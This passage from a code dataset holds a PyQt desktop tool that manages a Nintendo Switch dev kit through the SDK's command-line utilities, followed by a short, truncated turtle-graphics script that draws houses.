subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to connect\")\n sms_box.setInformativeText(\n \"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n self.Aplications = subprocess.check_output(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe list-application')\n self.App_Result = self.Aplications.decode(\"latin1\", 'ignore').split('\\n')\n result = \"\"\n for i in range(2, len(self.App_Result) - 3):\n result = result + self.App_Result[i]\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Applications \")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"Installed applications are:\")\n sms_box.setInformativeText(result)\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n '''Get Console list'''\n def console_list(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to connect\")\n sms_box.setInformativeText(\n \"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n self.Consoles = subprocess.check_output(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe list-target')\n self.Console_Result = self.Consoles.decode(\"latin1\", 'ignore').split('\\t')\n result = \"\"\n for i in range(0, len(self.Console_Result) - 1):\n result = result + self.Console_Result[i]\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Consoles \")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"Registered Consoles: \")\n sms_box.setInformativeText(result)\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n\n '''***************** Console Menu Functions' Declaration *****************'''\n '''Connect console'''\n def connect_console(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to connect\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"Switch console has been connected to Nintendo Target Manager\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n #self.Connect_Console.setEnabled(False)\n #self.Disconnect_Console.setEnabled(True)\n\n '''Disconnect console'''\n def disconnect_console(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to disconnect\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe disconnect')\n sms_box = QtWidgets.QMessageBox()\n #self.sms_box.setParent(self)\n sms_box.setWindowTitle(\"Disconnection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"Switch kit has been disconnected from Nintendo Target Manager\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n #self.Disconnect_Console.setEnabled(False)\n #self.Connect_Console.setEnabled(True)\n\n '''Turn off console'''\n def power_off(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to Power Off\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe power-off')\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Power Off Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"Powering Off console... Please sit tight.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n\n '''Restart console'''\n def reboot(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to Reboot\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe reset')\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Reboot Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"Rebooting console... Please sit tight.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n '''***************** Help Menu Functions' Declaration *****************'''\n '''Developed by'''\n def about(self):\n self.sms_box = QtWidgets.QMessageBox()\n pixmap = QPixmap(r'C:\\Users\\dchitale\\Desktop\\download.png')\n self.sms_box.setWindowTitle(\"About Information \")\n self.sms_box.isSizeGripEnabled()\n self.sms_box.setText(\"This app is developed by Datta\")\n self.sms_box.setInformativeText(\"Switch Interface v1.0
    All rights reserved © 2021\")\n self.sms_box.setIcon(self.sms_box.Information)\n self.sms_box.exec_()\n\n def home_url(self):\n QDesktopServices.openUrl(QtCore.QUrl('https://world.ubisoft.org/job/quality_control/nzone/nzone.html'))\n\n def training_doc_explorer(self):\n os.startfile(r'\\\\ubisoft.org\\punstudio\\QC\\Public\\Platform New\\Console Docs\\NINTENDO NX\\Switch_Training')\n\n def ndi_doc(self):\n QDesktopServices.openUrl(QtCore.QUrl('file:///D:/NintendoSDK/NintendoSDK_10_4_0/NintendoSDK/Documents/Package/contents/title.html'))\n\n\n '''***************** First tab \"Media and attachment\" class *****************'''\nclass Tab_Media(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n #Create Screenshot groupbox\n self.Media_screenshot_grp_box = QtWidgets.QGroupBox(\"Screenshot Section\")\n self.Media_screenshot_grp_box.setMaximumHeight(70)\n #Create Copy groupbox\n self.Media_copy_grp_box = QtWidgets.QGroupBox(\"Copy Album Section\")\n self.Media_copy_grp_box.setMaximumHeight(70)\n #Create Delete groupbox\n self.Media_delete_grp_box = QtWidgets.QGroupBox(\"Delete Album Section\")\n self.Media_delete_grp_box.setMaximumHeight(70)\n\n '''*********************** create widgets for all three groupboxes ***********************'''\n #create and add widgets for Screenshot groupbox\n self.Screenshot_lable = QtWidgets.QLabel(\"Take a screenshot directly\")\n self.Screenshot_button = QtWidgets.QPushButton(\" Screenshot\")\n self.Screenshot_button.setStyleSheet('font:bold')\n self.Screenshot_button.setIcon(QIcon(\"screenshot.png\"))\n self.Screenshot_button.setMaximumWidth(100)\n # add above widgets to screenshot_grp_box\n self.V_screenshot_grp_box = QtWidgets.QHBoxLayout()\n #self.V_screenshot_grp_box.setAlignment(QtCore.Qt.AlignCenter)\n self.V_screenshot_grp_box.addWidget(self.Screenshot_lable)\n self.V_screenshot_grp_box.addWidget(self.Screenshot_button)\n # set screenshot_grp_box's layout\n self.Media_screenshot_grp_box.setLayout(self.V_screenshot_grp_box)\n\n #create and add widgets for Copy groupbox\n self.Copy_lable = QtWidgets.QLabel(\"Copy all attachments from console to PC\")\n self.Copy_button = QtWidgets.QPushButton(\" Copy Album\")\n self.Copy_button.setStyleSheet('font:bold')\n self.Copy_button.setIcon(QIcon(\"copy.png\"))\n self.Copy_button.setMaximumWidth(100)\n # add above widgets to screenshot_grp_box\n self.V_copy_grp_box = QtWidgets.QHBoxLayout()\n self.V_copy_grp_box.addWidget(self.Copy_lable)\n self.V_copy_grp_box.addWidget(self.Copy_button)\n # set Copy_grp_box's layout\n self.Media_copy_grp_box.setLayout(self.V_copy_grp_box)\n\n # create and add widgets for Delete groupbox\n self.Delete_lable = QtWidgets.QLabel(\"Delete all attachments from console album\")\n self.Delete_button = QtWidgets.QPushButton(\"Delete Album\")\n self.Delete_button.setStyleSheet('font:bold')\n self.Delete_button.setIcon(QIcon(\"trash.png\"))\n self.Delete_button.setMaximumWidth(100)\n # add above widgets to screenshot_grp_box\n self.V_delete_grp_box = QtWidgets.QHBoxLayout()\n self.V_delete_grp_box.addWidget(self.Delete_lable)\n self.V_delete_grp_box.addWidget(self.Delete_button)\n # set Copy_grp_box's layout\n self.Media_delete_grp_box.setLayout(self.V_delete_grp_box)\n '''*********************** creating done here ***********************'''\n\n '''*********************** add all above to main layout ***********************'''\n self.Main_layout = QtWidgets.QVBoxLayout()\n #self.Main_layout.setAlignment(QtCore.Qt.AlignTop)\n self.Main_layout.addWidget(self.Media_screenshot_grp_box)\n self.Main_layout.addWidget(self.Media_copy_grp_box)\n self.Main_layout.addWidget(self.Media_delete_grp_box)\n self.setLayout(self.Main_layout)\n\n\n #Connections\n self.Screenshot_button.clicked.connect(self.take_screenshot)\n self.Delete_button.clicked.connect(self.delete_all_attachments)\n self.Copy_button.clicked.connect(self.copy_all_attachments)\n\n '''***************** Button Connections' Functions Declaration *****************'''\n def take_screenshot(self):\n if not os.path.exists(r'D:\\Album'):\n os.makedirs(r'D:\\Album')\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe take-screenshot --directory=\"D:\\Album\"')\n os.startfile(r'D:\\Album')\n\n def delete_all_attachments(self):\n self.sms_box = QtWidgets.QMessageBox()\n self.sms_box.setWindowTitle(\"Confirmation \")\n self.sms_box.setText(\"Are you sure you want to delete all attachments from console?\")\n self.sms_box.setStandardButtons(self.sms_box.Yes | self.sms_box.No)\n self.sms_box.setIcon(self.sms_box.Warning)\n self.press = self.sms_box.exec_()\n if self.press == self.sms_box.Yes:\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\RunOnTarget.exe --suppress-auto-kill D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\TargetTools\\NX-NXFP2-a64\\DevMenuCommand\\Release\\DevMenuCommand.nsp -- album clean --storage builtin')\n self.sms_box = QtWidgets.QMessageBox()\n self.sms_box.setWindowTitle(\"Delete information\")\n self.sms_box.setText(\"All the attachments have been deleted\")\n self.sms_box.setIcon(self.sms_box.Information)\n self.sms_box.exec_()\n else:\n self.sms_box.close()\n\n def copy_all_attachments(self):\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\RunOnTarget.exe --suppress-auto-kill D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\TargetTools\\NX-NXFP2-a64\\DevMenuCommand\\Release\\DevMenuCommand.nsp -- album download --storage builtin --directory D:\\Album')\n self.sms_box = QtWidgets.QMessageBox()\n self.sms_box.setWindowTitle(\"Download information\")\n self.sms_box.setText(\"Downloading Album completed.\")\n self.sms_box.setIcon(self.sms_box.Information)\n self.sms_box.setStandardButtons(self.sms_box.Open)\n self.sms_box.exec_()\n os.startfile(r'D:\\Album')\n\n\n\n'''***************** Second tab \"Manage Applications\" class *****************'''\nclass Tab_Applications(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n #Create App's first groupbox\n self.App_first_grp_box = QtWidgets.QGroupBox(\"Application Launcher\")\n self.App_first_grp_box.setMaximumHeight(70)\n #Create App's second groupbox\n self.App_second_grp_box = QtWidgets.QGroupBox(\"Application Terminator\")\n self.App_second_grp_box.setMaximumHeight(70)\n #Create App's third groupbox\n self.App_third_grp_box = QtWidgets.QGroupBox(\"Application Uninstaller\")\n self.App_third_grp_box.setMaximumHeight(70)\n # Create App's 4th groupbox\n self.App_fourth_grp_box = QtWidgets.QGroupBox(\"Application Installer\")\n self.App_fourth_grp_box.setMaximumHeight(70)\n\n\n '''*********************** create widgets for all three groupboxes ***********************'''\n #create and add widgets for App's first groupbox\n self.Launch_lable = QtWidgets.QLabel(\"Launch an installed Application\")\n self.Launch_button = QtWidgets.QPushButton(\"Launch\")\n self.Launch_button.setIcon(QIcon(\"launch.png\"))\n self.Launch_button.setStyleSheet('font:bold')\n #self.Screenshot_button.setIcon(QIcon(\"screenshot.png\"))\n self.Launch_button.setMaximumWidth(83)\n # add above widgets to App's first_grp_box\n self.V1_App_first_grp_box = QtWidgets.QHBoxLayout()\n self.V1_App_first_grp_box.addWidget(self.Launch_lable)\n self.V1_App_first_grp_box.addWidget(self.Launch_button)\n # set App's first_grp_box's layout\n self.App_first_grp_box.setLayout(self.V1_App_first_grp_box)\n\n #create and add widgets for App's second groupbox\n self.Terminate_lable = QtWidgets.QLabel(\"Terminate the running Application only\")\n self.Terminate_button = QtWidgets.QPushButton(\"Terminate\")\n self.Terminate_button.setIcon(QIcon(\"terminate.png\"))\n self.Terminate_button.setStyleSheet('font:bold')\n #self.Terminate_button.setIcon(QIcon(\"copy.png\"))\n self.Terminate_button.setMaximumWidth(83)\n # add above widgets to App's second groupbox\n self.V_Terminate_grp_box = QtWidgets.QHBoxLayout()\n self.V_Terminate_grp_box.addWidget(self.Terminate_lable)\n self.V_Terminate_grp_box.addWidget(self.Terminate_button)\n # set App's second groupbox's layout\n self.App_second_grp_box.setLayout(self.V_Terminate_grp_box)\n\n # create and add widgets for App's third groupbox\n self.Uninstall_lable = QtWidgets.QLabel(\"Uninstall the selected Application\")\n self.Uninstall_button = QtWidgets.QPushButton(\"Uninstall\")\n self.Uninstall_button.setIcon(QIcon(\"uninstall.png\"))\n self.Uninstall_button.setStyleSheet('font:bold')\n #self.Uninstall_button.setIcon(QIcon(\"trash.png\"))\n self.Uninstall_button.setMaximumWidth(83)\n # add above widgets to App's third groupbox\n self.V_uninstall_grp_box = QtWidgets.QHBoxLayout()\n self.V_uninstall_grp_box.addWidget(self.Uninstall_lable)\n self.V_uninstall_grp_box.addWidget(self.Uninstall_button)\n # set App's third groupbox's layout\n self.App_third_grp_box.setLayout(self.V_uninstall_grp_box)\n\n\n # create and add widgets for App's fourth groupbox\n self.Install_lable = QtWidgets.QLabel(\"Install the selected Application\")\n self.Install_button = QtWidgets.QPushButton(\"Install\")\n self.Install_button.setIcon(QIcon(\"uninstall.png\"))\n self.Install_button.setStyleSheet('font:bold')\n # self.Uninstall_button.setIcon(QIcon(\"trash.png\"))\n self.Install_button.setMaximumWidth(83)\n # add above widgets to App's third groupbox\n self.V_Install_grp_box = QtWidgets.QHBoxLayout()\n self.V_Install_grp_box.addWidget(self.Install_lable)\n self.V_Install_grp_box.addWidget(self.Install_button)\n # set App's third groupbox's layout\n self.App_fourth_grp_box.setLayout(self.V_Install_grp_box)\n\n '''*********************** creating done here ***********************'''\n\n '''*********************** add all above to main layout ***********************'''\n self.Main_layout = QtWidgets.QVBoxLayout()\n #self.Main_layout.setAlignment(QtCore.Qt.AlignTop)\n self.Main_layout.addWidget(self.App_first_grp_box)\n self.Main_layout.addWidget(self.App_second_grp_box)\n self.Main_layout.addWidget(self.App_third_grp_box)\n self.Main_layout.addWidget(self.App_fourth_grp_box)\n self.setLayout(self.Main_layout)\n\n\n #Connections\n self.Launch_button.clicked.connect(self.launch_app)\n self.Terminate_button.clicked.connect(self.terminate_app)\n self.Uninstall_button.clicked.connect(self.uninstall_app)\n self.Install_button.clicked.connect(self.install_app)\n\n def launch_app(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found and Failed to launch application\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n else:\n res = subprocess.check_output(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe list-application')\n cmd_result = res.decode(\"latin1\", 'ignore').split('\\n')\n result = []\n for i in range(2, len(cmd_result)-3):\n result.append(cmd_result[i])\n# if no applications are installed - list is empty\n if len(result) == 0:\n self.sms_box = QtWidgets.QMessageBox()\n self.sms_box.setWindowTitle(\"App Information\")\n self.sms_box.setText(\"There are no Games or Applications installed on the console!!!\")\n self.sms_box.setInformativeText(\"Please install a Game/Application first in order to launch it.\")\n self.sms_box.setIcon(self.sms_box.Information)\n self.sms_box.exec_()\n#Else populate list to QinputDialog and launch selected applicaion\n else:\n self.input_dialogue = QtWidgets.QInputDialog()\n text, ok = self.input_dialogue.getItem(self, \"Application selection\",\"Select an application to launch:\", result, 0, False)\n if ok:\n comm = r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe launch-application '+text\n subprocess.Popen(comm)\n else:\n self.input_dialogue.close()\n\n #self.Launch_button.setEnabled(False)\n\n def terminate_app(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found and Failed to terminate application\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n\n else:\n subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe terminate')\n self.Launch_button.setEnabled(True)\n\n def uninstall_app(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found and Failed to uninstall application\")\n sms_box.setInformativeText(\"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n res = subprocess.check_output(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe list-application')\n cmd_result = res.decode(\"latin1\", 'ignore').split('\\n')\n result = []\n for i in range(2, len(cmd_result) - 3):\n if cmd_result [i] == '0x0100000000002065 1.0.0 DevMenu Application \\r':\n continue\n result.append(cmd_result[i])\n #print(result)\n# if the applications are not installed (exclude DevMenu - risk to uninstall it)- list is empty\n if len(result) == 0:\n self.sms_box = QtWidgets.QMessageBox()\n self.sms_box.setWindowTitle(\"App Information\")\n #self.sms_box.setStyleSheet('font:bold')\n self.sms_box.setText(\"No Games or Applications installed on the console!!!\")\n self.sms_box.setInformativeText(\"Please install a Game/Application on console first.\")\n self.sms_box.setIcon(self.sms_box.Information)\n self.sms_box.exec_()\n#Else populate list to QinputDialog and launch selected applicaion\n else:\n self.input_dialogue = QtWidgets.QInputDialog()\n text, ok = self.input_dialogue.getItem(self, \"Application selection\", \"Select an application to uninstall:\",result, 0, False)\n if ok:\n comm = r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe uninstall-application ' + text\n subprocess.Popen(comm)\n else:\n self.input_dialogue.close()\n\n def install_app(self):\n Alive_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe check-alive --any')\n Connection_out = subprocess.Popen(r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe connect')\n if Alive_out.wait() != 0 or Connection_out.wait() != 0:\n sms_box = QtWidgets.QMessageBox()\n sms_box.setWindowTitle(\"Connection Information\")\n sms_box.setWindowIcon(QIcon(\"Main_Logo.ico\"))\n sms_box.setText(\"No Target found or Failed to connect\")\n sms_box.setInformativeText(\n \"Please connect/reconnect console to PC using Type C cable or wake it up from sleep mode.\")\n sms_box.setIcon(sms_box.Information)\n sms_box.exec_()\n else:\n File_name = QtWidgets.QFileDialog.getOpenFileName(self, 'Open nsp build file', r\"C:\\\\\", 'Nsp file(*.nsp)')\n\n #Exit = None\n comm = r'D:\\NintendoSDK\\NintendoSDK_10_4_0\\NintendoSDK\\Tools\\CommandLineTools\\ControlTarget.exe install-application ' + File_name[0]\n Installation_progress = subprocess.Popen(comm, stdout=subprocess.PIPE, universal_newlines=True)\n\n print(\"Datta\")\n while Installation_progress.poll() is None:\n print(\"datta\")\n #line = Installation_progress.stdout.readline()\n #print(line.strip())\n #if \"Exit\" in line:\n #Exit = True\n #till Installation_result.wait() ! = 0\n '''---------------- progress bar'''\n\n\n\n\n\n\n\n\napp = QtWidgets.QApplication(sys.argv)\ndialog = My_Main_Dialog('Switch Interface')\ndialog.show()\nsys.exit(app.exec_())\n\n","repo_name":"dattachitale/My-Portfolio","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":38915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"4872560216","text":"import turtle as t\r\nfrom PIL import ImageGrab\r\n\r\n\r\ndef build_house(base_x = -500, base_y = -500, base_width = 100, base_height = 10, base_fill = \"#000000\", walls_width = 20, walls_height = 20, walls_fill = \"#000000\", door_fill = \"#b81f00\", roof_width = 0, roof_height = 0, roof_fill = \"#000000\"):\r\n \"\"\"\r\n base_x — X левого нижнего угла фундамента\r\n base_y — Y левого нижнего угла фундамента\r\n base_width — ширина фундамента\r\n base_height — высота фундамента\r\n base_fill — цвет заливки фундамента\r\n walls_x - считаем автоматически\r\n walls_y - считаем автоматически\r\n walls_width - спрашиваем у заказчика\r\n walls_height - спрашиваем у заказчика\r\n walls_fill - спрашиваем у заказчика\r\n roof_x - считаем автоматически\r\n roof_y - считаем автоматически\r\n roof_width - спрашиваем у заказчика\r\n roof_height - спрашиваем у заказчика\r\n roof_fill - спрашиваем у заказчика\r\n door_x - считаем автоматически\r\n door_y -считаем автоматически\r\n door_width - стандартная (возможно в будущем, будем спрашивать у заказчика)\r\n door_height - стандартная (возможно в будущем, будем спрашивать у заказчика)\r\n door_fill - спрашиваем у заказчика\r\n \r\n \"\"\"\r\n img = ImageGrab.grab()\r\n screen_width = img.size[0]\r\n screen_height = img.size[1]\r\n\r\n ts = t.getscreen()\r\n ts.screensize(screen_width, screen_height)\r\n\r\n t.speed(0)\r\n walls_x = base_x\r\n walls_y = base_y + base_height\r\n walls_width = base_width\r\n door_width = 75\r\n door_height = 100\r\n door_x = (walls_width - door_width) / 2 + base_x\r\n door_y = base_height + base_y \r\n roof_x = walls_x - (walls_width * 0.1)\r\n roof_y = walls_y + walls_height\r\n roof_width = walls_width * 1.2\r\n\r\n\r\n\r\n def build_base(base_x, base_y, base_width, base_height, base_fill):\r\n print(f\"The foundation team has arrived and is digging a foundation pit in {base_x} and {base_y}\")\r\n t.penup()\r\n t.setheading(0)\r\n t.goto(base_x, base_y)\r\n t.pendown()\r\n t.fillcolor(base_fill)\r\n t.begin_fill()\r\n t.forward(base_width)\r\n t.left(90)\r\n t.forward(base_height)\r\n t.left(90)\r\n t.forward(base_width)\r\n t.left(90)\r\n t.forward(base_height)\r\n t.left(90)\r\n t.end_fill()\r\n\r\n\r\n def build_walls(walls_x, walls_y, walls_width, walls_height, walls_fill):\r\n print(\"brigade walls come\")\r\n t.penup()\r\n t.setheading(0)\r\n t.goto(walls_x, walls_y)\r\n t.pendown()\r\n t.fillcolor(walls_fill)\r\n t.begin_fill()\r\n t.forward(walls_width)\r\n t.left(90)\r\n t.forward(walls_height)\r\n t.left(90)\r\n t.forward(walls_width)\r\n t.left(90)\r\n t.forward(walls_height)\r\n t.left(90)\r\n t.end_fill()\r\n\r\n\r\n def build_door(door_x, door_y, door_width, door_height, door_fill):\r\n t.penup()\r\n t.setheading(0)\r\n t.goto(door_x, door_y)\r\n t.pendown()\r\n t.fillcolor(door_fill)\r\n t.begin_fill()\r\n t.forward(door_width)\r\n t.left(90)\r\n t.forward(door_height)\r\n t.left(90)\r\n t.forward(door_width) \r\n t.left(90)\r\n t.forward(door_height)\r\n t.left(90)\r\n t.end_fill()\r\n\r\n\r\n\r\n def build_roof(roof_x, roof_y, roof_width, roof_height, roof_fill):\r\n print(\"brigade roof come\")\r\n print(walls_width / 2 + base_x, base_height + walls_height + roof_height + base_y)\r\n t.penup()\r\n t.goto(roof_x, roof_y)\r\n t.setheading(0)\r\n t.fillcolor(roof_fill)\r\n t.pendown()\r\n t.begin_fill() \r\n t.forward(roof_width)\r\n t.goto(walls_width / 2 + base_x, base_height + walls_height + roof_height + base_y)\r\n t.goto(roof_x, roof_y)\r\n t.end_fill()\r\n\r\n\r\n build_base(base_x, base_y, base_width, base_height, base_fill)\r\n build_walls(walls_x, walls_y, walls_width, walls_height, walls_fill)\r\n build_door(door_x, door_y, door_width, door_height, door_fill)\r\n build_roof(roof_x, roof_y, roof_width, roof_height, roof_fill) \r\n print(\"house construction completed\")\r\n\r\n\r\nbuild_house(base_x = -100, base_y = -40, base_width = 200, base_height = 10, base_fill = \"#993300\", walls_height = 160, walls_fill = \"#e2e2e2\", door_fill = \"#b81f00\", roof_height = 100, roof_fill = \"#fba67f\")\r\nbuild_house(base_x = 150, base_y = -330, base_width = 300, base_height = 50, base_fill = \"#993300\", walls_height = 1700, walls_fill = \"#e2e2e2\", door_fill = \"#b81f00\", roof_height = 160, roof_fill = \"yellow\")\r\nbuild_house(base_x = 400, base_y = -340, base_width = 200, base_height = 1, base_fill = \"#993300\", walls_height = 160, walls_fill = \"#e2e2e2\", door_fill 